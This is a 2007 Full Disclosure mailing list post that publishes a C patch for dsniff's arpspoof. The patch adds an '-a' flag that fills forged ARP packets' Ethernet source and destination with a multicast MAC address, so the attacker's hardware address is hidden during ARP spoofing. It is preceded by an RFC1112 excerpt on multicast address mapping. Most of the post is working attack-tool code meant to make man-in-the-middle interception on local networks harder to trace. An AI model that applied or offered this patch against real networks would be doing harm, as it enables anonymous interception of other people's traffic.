Full Disclosure mailing list archives
PATCH: Anonymous Spoofing via Multicast ARP (dsniff / arpspoof)
From: "Kristian Hermansen" <kristian.hermansen () gmail com>
Date: Mon, 25 Jun 2007 23:40:29 -0400
I am not sure if this technique is widely used or known, but RFC1112 defines multicast link-layer features for use in conjunction with multicast IP. You get a reserved address plus 23 bits to play with which correspond to the least significant bits of a typical multicast IP in the range of 224.b.c.d. The range that is reserved begins at 01:00:5e:00:00:00 and ends at 01:00:5e:7f:ff:ff. <snip> 6.4. Extensions to an Ethernet Local Network Module The Ethernet directly supports the sending of local multicast packets by allowing multicast addresses in the destination field of Ethernet packets. All that is needed to support the sending of multicast IP datagrams is a procedure for mapping IP host group addresses to Ethernet multicast addresses. An IP host group address is mapped to an Ethernet multicast address by placing the low-order 23-bits of the IP address into the low-order 23 bits of the Ethernet multicast address 01-00-5E-00-00-00 (hex). Because there are 28 significant bits in an IP host group address, more than one host group address may map to the same Ethernet multicast address. </snip> khermans@khermans-laptop:~/projects/anonnyarp/dsniff-2.4b1+debian$ cat dsniff_arpspoof_2.4b1_anon-khermans.patch --- arpspoof.c.orig 2007-06-22 21:24:26.169638763 -0400 +++ arpspoof.c 2007-06-25 23:08:51.786962797 -0400 @@ -31,12 +31,13 @@ static struct ether_addr spoof_mac, target_mac; static in_addr_t spoof_ip, target_ip; static char *intf; +static int anon; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" - "Usage: arpspoof [-i interface] [-t target] host\n"); + "Usage: arpspoof [-a] [-i interface] [-t target] host\n"); exit(1); } @@ -51,14 +52,20 @@ (sha = (u_char *)libnet_get_hwaddr(llif, dev, ebuf)) == NULL) { return (-1); } + if (spa == 0) { if ((spa = libnet_get_ipaddr(llif, dev, ebuf)) == 0) return (-1); spa = htonl(spa); /* XXX */ } + if (tha == NULL) tha = "\xff\xff\xff\xff\xff\xff"; + if (anon) { + sha = tha = "\x01\x00\x5e\x00\x00\x01"; + } + libnet_build_ethernet(tha, sha, ETHERTYPE_ARP, NULL, 0, pkt); libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4, @@ -154,11 +161,15 @@ char ebuf[PCAP_ERRBUF_SIZE]; int c; + anon = 0; intf = NULL; spoof_ip = target_ip = 0; - while ((c = getopt(argc, argv, "i:t:h?V")) != -1) { + while ((c = getopt(argc, argv, "ahi:t?V")) != -1) { switch (c) { + case 'a': + anon = 1; + break; case 'i': intf = optarg; break; -- Kristian Hermansen
Attachment:
dsniff_arpspoof_2.4b1_anon-khermans.patch
Description:
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- PATCH: Anonymous Spoofing via Multicast ARP (dsniff / arpspoof) Kristian Hermansen (Jun 25)